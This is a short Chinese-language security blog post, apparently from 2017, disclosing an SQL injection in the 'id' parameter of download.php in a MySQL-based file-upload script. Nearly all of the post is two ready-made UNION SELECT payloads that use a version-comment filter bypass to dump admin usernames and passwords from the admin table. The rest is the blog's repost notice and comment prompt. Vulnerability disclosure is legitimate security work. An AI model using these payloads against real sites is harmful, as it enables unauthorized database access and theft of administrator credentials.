MySQL文件上传-ID参数SQL注入

SQL Injection/Exploit :

# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...

本文固定链接: https://www.unhonker.com/bug/1973.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年02月08日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: MySQL文件上传-ID参数SQL注入 | 90' s Blog|关注网络信息安全

MySQL文件上传-ID参数SQL注入:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!